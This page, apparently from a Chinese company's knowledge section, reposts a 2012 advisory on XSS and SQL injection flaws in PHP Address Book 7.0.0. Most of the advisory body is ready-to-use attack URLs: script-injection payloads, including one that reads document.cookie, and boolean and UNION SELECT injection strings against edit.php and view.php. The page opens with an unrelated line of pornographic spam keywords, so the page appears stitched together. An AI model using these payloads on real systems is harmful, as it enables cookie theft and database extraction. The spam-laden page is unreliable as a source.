欧美激情网,国产欧美亚洲高清,欧美屁股xxxxx,欧美群妇大交群,欧美人与物ⅴideos另类,区二区三区在线 | 欧洲

知識(shí)學(xué)堂
  • ·聯(lián)系電話:+86.023-75585550
  • ·聯(lián)系傳真:+86.023-75585550
  • ·24小時(shí)手機(jī):13896886023
  • ·QQ 咨 詢:361652718 513960520
當(dāng)前位置 > 首頁 > 知識(shí)學(xué)堂 > 常見技術(shù)問題
PHP Address Book 7.0.0多個(gè)缺陷及修復(fù)
更新時(shí)間:2012-05-25 | 發(fā)布人:本站 | 點(diǎn)擊率:527

 標(biāo)題: PHP Address Book 7.0.0 Multiple security vulnerabilities

作者: Stefan Schurtz
受影響軟件: Successfully tested on PHP Address Book 7.0.0
開發(fā)者網(wǎng)站: http://sourceforge.net/projects/php-addressbook/
缺陷描述
 
PHP Address Book 7.0.0含多個(gè) XSS 和 SQLi缺陷
 
測試方法
 
// XSS
 
http://[target]/addressbookv7.0.0/preferences.php?from='"</script><script>alert('xss')</script>
http://www.xxx.com /addressbookv7.0.0/group.php/" /><script> alert('xss')</script>
http://[target]/addressbookv7.0.0/index.php?group='"</script><script>alert(document.cookie)</script>
 
// SQLi
 
http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1<2,2,1)
http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1>2,2,1)
 
// UNION-based Injection, needs 'magic_quotes=off'
http://[target]/addressbookv7.0.0/view.php?id=1' UNION ALL SELECT NULL, NULL, version(), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--+
 
修復(fù):
加強(qiáng)過濾
相關(guān)文章